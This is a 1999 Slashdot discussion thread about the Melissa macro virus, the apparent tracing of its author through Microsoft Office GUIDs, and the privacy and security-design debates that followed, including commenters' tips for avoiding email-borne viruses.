    Loren Osborn

  • Visual Basic is not part of the HTML standard... what you are talking about is a virus that ONLY affects Windows users who are running MS IE.

    Good thing too. Isn't this what Darwinism is all about? Hee hee.. don't see NEARLY as many virii on Linux or MacOS (nasty exception: HK automount virus).

    Anyways, back to my point... VB is the same rotten core found in Office - HTML has nothing to do with it. The "finder" of this virus tried to whip up a media scare about HTML, and FAILED...
  • As far as I'm concerned, who cares! Its an invasion of privacy none-the-less.
  • The Microsoft security website all but explained to this virus author how he should write his virus.

    Microsoft Security Bulletin 99-002 [microsoft.com] points out the "vulnerability in Word 97 which could permit macros to run without warning the user when the user opens a document based on a template containing macros." Melissa modifies Word templates to do exactly this.

    Microsoft's webpage continues with the warning "A malicious hacker could exploit this vulnerability to cause malicious macro code to be run without warning if a user opens a Word attachment that was sent by a malicious hacker..."

    This security bulletin was posted to the Microsoft Knowledge Base on January 21, 1999.

    Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.

    Posting to an obscure security webpage hints on what might make an effective virus - a virus for which the only fix is tens of millions of separate patch downloads - is asking for trouble. Microsoft created the problem by coding a laughably insecure macro language into their applications. And they may have turned the potential problem into a real one by calling attention to it.

    "Security through obscurity" is never desirable, but when the system is already as broken as the Microsoft macro language and when the user community doesn't give a damn about applying patches, it might have been a better alternative.

    (Credit to TBTF [tbtf.com] for the link.)

    Jamie McCarthy

  • by Scott Madin ( 5020 ) on Tuesday March 30, 1999 @08:21AM (#1956857) Homepage

    So how should we feel about this? The ZDnet article only discusses the facts of the situation, which is as if should be, though there's a slight air of "this privacy-invading software feature helped catch a bad guy so it's OK" to it.

    Is it good that the author's been traced? yeah, I suppose so. Doesn't matter all that much really, but I dislike viruses and their authors as much as the next person. If there's good enough proof that this is the author, and some damage can be shown, then I suppose I'm all for prosecuting.

    But I care a lot less about that than about the way they caught him. It seems to me we can't just go along, and say what the ZDnet article seems, ever so slightly, to be implying: that it's all right for MS (and by extension, Intel) to build identifiers like this into their products so that anything people who use those products do is traceable, just because once it helped catch someone who was doing something illegal. That's like saying "sure, the FBI can go ahead and install a wiretap on everyone's phone--fine by me, I'm not doing anything illegal, and only people who are would have to worry about that." I don't think anyone in their right mind would agree to something like that; and it violates all the principles on which our legal system is founded: "presumed innocent until proven guilty."

    It's good that they caught the author of the virus, if that were all that this meant. But it's not. I hope they don't try to prosecute unless they obtain stronger evidence, through more valid means; and if they do prosecute, I hope they don't try to use the Office-ID-number-trace in court. If they do, we're all going to have to start worrying. And looking over our shoulders.

  • I would tend to believe that someone who is
    stupid enough to write on WordBasic for self-expression (and what other purpose such viruses have), doesn't probably know enough
    of hex editors to falsificate GUID.

    And why care about some ID number while you
    are willingfully sending out big chunks of
    arbitrary information from your computer with
    word file (which can contain your dialup password,
    private mail and even secring.pgp), waiting
    only for someone with LAOLA to investigate it.

    I have recieved reports from catdoc users, that
    they was able to read future plans of their bosses, which wasn't intended to be sent just now.

    Imagine surprise of boss when emploee begin to
    discuss with him plans, which weren't even send
    (in boss opinion)
  • by philg ( 8939 ) on Tuesday March 30, 1999 @10:06AM (#1956873)

    First off, well said, Mr. Madin.

    This piece clearly implies that the MSID is a powerful law enforcement tool on the Digital Frontier. (BTW, I thought the out-of-nowhere references to the FBI were a nice touch.) That idea doesn't hold water, for a number of reasons. Apparently, ZD will gratuitously reinforce their message with questionable stuff like that FBI reference, but won't do the homework necessary to refute arguments that logically arise from their implied assertion.

    If they can be refuted, I don't think they can.

    First, there's no reason this will ever trap another hacker again, malicious or not. None. Anyone smart enough to write a Word97 macro is smart enough to obtain their own MAC address, scan the file for it, and remove it.

    Is the address encrypted? The article doesn't say, which leads me to believe that it's not. Even if they do end up encrypting the thing, how hard will it be to decrypt? The only people you'll track down with this will be script kiddies killing time. Hackers knowledgeable enough to do genuine damage to a defended infrastructure are knowledgeable enough to find this ID and neutralize it.

    "But that doesn't apply to the Intel ID," I can hear the ZD sycophants opine, "the Intel ID is a hardware ID, and no hacker can erase that!"

    Fair enough. And the MAC address isn't?

    In order for this ID to be useful in tracking down the origin of a virus, it has to be propagated in a file. Any file can be searched and have its contents modified. Period. The kind of ID you have makes no difference after it's overwritten.

    So this ID will only end up in documents that are:

    1. Not malicous.
    2. Malicious, but still untraceable (i.e., email automatically generated by a user who triggered a virus). In this case the ID is, to say the least, of limited value.

    So the only people the ID can track are law-abiding citizens who don't care to remove the ID because their intentions are not malicious. Now why would you want to track them?

    The answer is left as an exercise to the reader.

    phil

  • On a tangent, I have to say that any virus that strikes only Outlook users must be seen as beneficial in the global sense.

    Only Microsoft could have taken a task as simple (by design!) as reading e-mail and evolve it into a beast that takes at least 8 MB of memory when running. Strangely enough, even Microsoft's own Outlook Express tool is far lighter and friendlier, without making you feel like you're firing up Word just to read an email.

    "Less is More" evidently isn't a design addage that is used much at Microsoft.
  • Microsoft has been warned over and over by the Windows security community (which, believe it or not, is alive and well) about security issues surrounding "active" content. But Microsoft is not one company (but then again, is any) to pay attention to any outside concern that do not address it own needs.

    While the evolution of Office macro language to VBA may be seem as a good thing, allowing the same code to unify all Office apps and use all features in a wholesome manner, the combined effect of VBA and the "webfication" of Office brings forth security issues far beyond a Melissa.

    Think about Melissa virus as a test and about its creator as script kid. The next virus will not be so harmless(the documented effect of Melissa is the slashdotting of some mail servers and a few hard undeserved words being screamed in corporations corridors) nor will its author be so reckless.

    Naturally I am assuming above that the GUID found points to right machine. Wouldn't it be funny if it doesn't? Remember, the number points to a machine. And it can easily be faked (there is even a specific C++ function in the COM API to generate GUIDs. It works in the absence of network cards).

    As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certanly use this as a showcase.
  • by afniv ( 10789 ) on Tuesday March 30, 1999 @08:18AM (#1956886) Homepage
    Quoting Masem:
    While I am probably being paranoid and overly sceptical, it's way too convinent that the Win98 ID bug, only uncovered recently, is suddenly going to be the life saver for solving the Melissa problem.

    The M$ GUID will not solve the Melissa virus from spreading. That will go on as long as one person has not taken the proper precautions.

    All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).

    Actually, the GUID creates more problems. If you want to help solve crimes in a similar manner, it would be beneficial to have wire taps and other eavesdropping devices in everyone's home. That way, if anyone in the United States mentions terrorism, they can be promptly arrested for plotting terrorist acts.

    All the GUID is is Big Bro looking over your shoulder. That's not a comfortable feeling for me.

    This latest development will certainly put privacy issues in regards to electronic forums to the forefront again.

    ~afniv
    "Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"
  • by sammy baby ( 14909 ) on Tuesday March 30, 1999 @08:08AM (#1956901) Journal
    There actually is a virus that will infect HTML documents [avp.com], but it relies on a Visual Basic hack to insert itself into HTML files.

    Of course, you're only vulnerable if you're running Windows. So, it's an HTML-borne virus that makes use of a Windows security hole. Doesn't matter if you have armor plated walls if the foundation is rotten.

  • by BiGGO ( 15018 ) on Tuesday March 30, 1999 @10:16AM (#1956903) Homepage
    I have an idea.
    lets expose a major security hole in one of our products,
    to let everyone see that GUID is a good thing.
    hell, they made security holes in purpose to make GUID useful.

    They planned it all along, ofcourse,
    they knew GUID would be exposed, so made it possible for them to say:
    "You need GUID because our products are bad and have many exploits for crackers to play with"

    it reminds me when Microsoft bragged that NT servers had failsafe modes,
    and when a server crashes,
    another server can replace it.
    If NT servers didnt crash so often nobody would care.



    ---
  • You would think that Exchange server administrators would be smart enough to at least start filtering attachments or running a virus scan on incoming traffic. I guess not, since M$ themselves were offline yesterday...

    It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....

    Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... why motivates M$ to deliberately ignore them?

    It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.

    Conspiracy theories, my ass. More than enough evidence to go on here.

  • by dillon_rinker ( 17944 ) on Tuesday March 30, 1999 @08:06AM (#1956921) Homepage
    This is the worst kind of bloat I can imagine - a fancy text editor mated to a BASIC interpreter. Granted the usefulness of an integrated development environment in your word processor, it is doubly insane to permit programs to run automatically when the document is opened. While it is possible to disables macros in Word, this is not the default. 90% of users don't use macros (unless they are infected), so why couldn't MS change just one bit in its ditribution from ON to OFF and do some serious good toward slowing the spread of macro viruses?

    The really sad thing is you can't sue them. They create an obviously deficient product, one which they could easily have changed to prevent material harm to their customers, yet they are not liable. But let somebody pour coffee all over their genitals, and Ronald McDonald is paying to the tune of $n*1E6.
  • Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.

    What's really laughable is this patch. It simply changes Word so that when you open a document with a macro, Word says "This document contains macros. Would you like to disable them?" It gives no clue what effect these macros may have. This is a fix?

    Mike
    --

  • by Anti-Sean ( 21722 ) on Tuesday March 30, 1999 @07:59AM (#1956952)
    hmmm.... The timing of these incidents seems a little too coincidental. "If it wasn't for those GUID's secretly embedded in MS Office documents, we may have never tracked down this evil perpertrator", says Joe Researcher, on his way to the bank to cash in his check from billg. "Thank goodness for GUID's!"

    or maybe i've had too much coffee this morning - my paranoia settings could need some recalibration.
  • by Kithran ( 24643 ) on Tuesday March 30, 1999 @08:09AM (#1956959)
    Having read the article I can't help wondering how hard the original virus writer would find it to change the GUID in his original file. If someone can extract the GUID from files on a website what is to stop the original author creating the original infected document and then changing its GUID to that belonging to a different instance of Office. And given the prevelence of AOL free membership CD's and the ease with which a poster to USENET can fake their address is it any wonder the original source appears to be an AOL (l)user.

    Kithran

  • Interesting opinion. I think it's pretty interesting, considering it points out how M$'s shoddy products lead to security holes. Granted, the /. community already knows this... But that's never stopped submissions from being posted before.

    Executable documents are just plain wrong.

    --

  • by Bob-K ( 29692 ) on Tuesday March 30, 1999 @08:55AM (#1956978)
    First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.

    What was discovered is that the GUID is transmitted to MS during the registration process.

    Of course, the likelihood that the macro writer registered his copy of Windows using his real name and address is probably.... zero. So it's doubtful that MS has any record that GUID.

    Which begs the question... What is the basis for ZDNet's claim that the GUID was used to "track" the document back to its creator?

    More likely, they used the NNTP headers to get some hints about where to look, and when THAT trail led somewhere, they compared GUID's and thus established an apparent connection.

    The real issue is not the recently discovered transmission of the GUID to MS during registration, it's the existence of the GUID itself that can reveal more about information than you realize. It's not "big brother," it's just bad design. And sloppy reporting.
  • by EisPick ( 29965 ) on Tuesday March 30, 1999 @09:35AM (#1956980)
    > Virus writers and crackers need to be given some serious jail time and fines.

    Agreed. Virus writers are like people shouting fire in a crowded theatre. They probably don't intend to really hurt anyone, but they know they are "playing with fire," so to speak. So if their actions hurt others they should be held accountable.

    That said, I'd rather let the virus writer get away with it than have every Office document carry a unique ID traceable to the author. Americans are too freely giving up their privacy. Time to fight back.
  • Questionable particularly in the light of the "most widespread PC virus attack ever."

    Here at CNET the decision was suddenly made this week to unilaterally roll out Outlook to all employees (Eudora was standard until now). What could the advantage of that change possibly be? Eudora is relatively small, reliable, and featureful; Outlook is enormous and crash-prone.

    Backroom deal with Microsoft?
  • .. although the guy apparently has a history of
    spreading virii, there is no proof that it was him..
    because of the publicity regarding the UID's, anyone
    smart enough to engineer this type of thing would
    be smart enough to be able to cover their tracks..

    The ZDNet artice claims that the MAC address is 'proof',
    but any semi-literate coder would know that it's pretty
    simple to change a MAC address (software settable..)

    All they have is circumstantial evidence, so anyone who's
    foolish enough to say "see the UIDS are good" is going to
    be proven to look the fool when he's aquitted.

    If the authorities push this, I hope the guy brings
    a huge civil lawsuit against MS for invasion of privacy.
  • by njl_ ( 31653 ) on Tuesday March 30, 1999 @08:40AM (#1956997)
    They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. Historical Review of Pennsylvania [1759] -- njl
  • So they've traced the author of the document by the ID numbers. This information CAN be forged, you know. There is a reason we don't allow random wiretaps in the US, beyond the whole privacy issue. Its because the simple discussion of a crime or thought of a crime is not in and of itself a crime, and therefore that can't be used against someone unless such a crime is committed.

    However, if a crime IS committed, and such wiretaps were in place, any person who had recently mentioned something even remotely similar in innoncent conversation while tapped would be instantly suspect, and with such a "likely prospect" prosecution would focus on that individual and neglect other leads which would be more realistic.

    However, if wiretaps are common practice, a clever criminal will find a way to bypass them, or use them to broadcast false information, and end up implicating innocents of crimes they commit. Remember, the reason that wiretaps are effective now is that on the rare event that they are used, under court order, the suspect does not expect them and in many cases won't be prepared.

    However, in the case of a court ordered wiretap, the police and/or prosecution already must have some probable cause to believe that the suspect is involved in a crime and that a wiretap would be beneficial to further evidence. Although this theory is pretty easy to get around, the police can get into serious civil trouble if too many "false alarms" are presented.

    You occassionally hear about a search/seisure that went wrong. The wrong house was raided, torn apart and nothing was found which presents evidence of a crime. The victims of this false raid have rights to legal compensation for the intrusion. This simply won't happen too often under today's guidelines.

    So if we come along and say that ID's are OK because we can trace criminals, we've gotten into the habit of invading the privacy of the innocent to weed out the guilty, even when no crime has taken place. If this can be attributed to a an
    "illegal wiretap", then the evidence which lead to the aol account and all evidence which followed up as a result of that could get thrown out of court by a clever lawyer.

    The real solution isn't really tracking down the virus writers anyway. Virus will always be with us. There is ZERO way to eliminate them completely, or to completely prevent new ones from being developed. Besides, it is remarkably simple to prevent getting infected, even if you don't have a virus scanner. It all comes down to a matter of trust.

    Almost all of this stuff starts because some idiot, and yes, I mean IDIOT downloads a virus from some complete stranger, and is compelled to spread this virus to all his friends. This is the same fool who time and again will forward hoaxes to everyone he knows just because since it came over the internet it MUST be for real. For this problem there are two solutions. Either discover the the problem trait and eliminate it from the gene pool, or determine which people you know are reliable and don't ever accept attachments from anyone else.

    Don't send word documents in email. I get so annoyed when people send me a 4 meg word document which has 10k worth of text in it. Do you think I'm going to waste my time reading it? I don't even have an installed copy of word, so its hardly important to me. Anyone who automatically assumes I will have office9? installed is not someone I wish to do business with. Forget the fact that half the time I don't even know what format the document is in, and don't think I'm going to spend any amount of time figuring it out.

    The only attachments I will ever look at are images. THATS IT. I consider email a method of transfering text. That's INFORMATION in a form I can easily desseminate and text is the lowest common denominator in size and has the highest compression rate. If I absolutely NEED to see some huge picture, just give me a link to it and I'll make the decision to waste the bandwidth on it.

    I have made a policy of reacting violently (in a verbal way) to anyone who sends me trash like this. I make it very clear, in no uncertain terms, that if they send me such information again I will prevent them from sending me ANYTHING again. Its amazing how able people are to distingush between hoaxes and legitimate information once you've made it clear what you don't want. Why is it then that they send it to you in the first place?

    Ok.. Here's my list of things to avoid. If you get it, delete it.

    - ALL spam, spam of all colors, it tastes just as bad. Don't reply from a legit mail account to complain, just delete it and forget about it.

    - ANY attachments other than very small pictures. Most email readers will decode pictures and display them automatically, while it will display a link for other attachments. Don't accept word documents, .exe files, or attachments of any form you're not familiar with (as they can be exe files in disguise)

    - Don't accept programs from ANYONE over icq or IRC. It doesn't matter WHAT it is or WHO sent it to you. Even if they're not trying to screw you over, you have no idea where they got it from or what might have infected their system previously and therefore the file they're sending you. Even if they're your best friend, you really don't know for sure. Ask them where they got the file from and download it from that source yourself. If they received it from someone else and don't know the source, then its automatically suspect already.

    Don't let anyone use your computer for ANY reason, with the exception of the system administrator if you're in a work environment. People who bring over a floppy disk, insert it in your computer and bring up a program or any other file could be infecting your computer. We have networks these days guys, you don't need to transfer files around on floppies anymore. Also, people who use your computer for chatting can also download and run programs, no matter how much effort you put into avoiding it.

    Avoid microsoft products. They're the greatest threat to the security of any environment. If you must use them, consider them to be insecure. Don't trust them for any tasks which must be fail-safe, and assume you'll have to reboot often and reload occasionally.

    Backup early, backup often, and keep your backups safe.

    -Restil
    restil@alignment.net

  • The GUID is not a unique identifier. It is based on the MAC address, which requires an Ethernet card. If the originating computer does not have an Ethernet card, DUPLICATE GUIDs are CREATED!!

    The ZDNet story reports that the GUID has traced back to an AOL user--however most users on AOL access the Internet via modems, and have no Ethernet card! (It suprises me that this caveat is not mentioned in the ZDNet article.) The GUID is likely identical to many other dial-up users.

    Also, since GUIDs are based on MAC address, GUIDs are tied to a specific computer (or more correctly, a specific Ethernet card)--not a specific user. This creates an interesting twist in a computer lab environment.

    And even then, MAC addresses can be faked. Or, if the GUID is stored in (I'm guessing) the Windows Registry, it's even easier to change.

    For these reasons, GUIDs are meaningless. It is a poorly designed user tracking mechanism that doesn't work. The only reason one should fear GUIDs is that they may be used as evidence which may lead to false prosecution by the ignorant.

    ---BTW, the GUID is not Microsoft application specific. GUIDs are available as part of Microsoft's API's, and are used in many non-Microsoft applications. Look around a little and you'll see.

The herd instinct among economists makes sheep look like independent thinkers.

Working...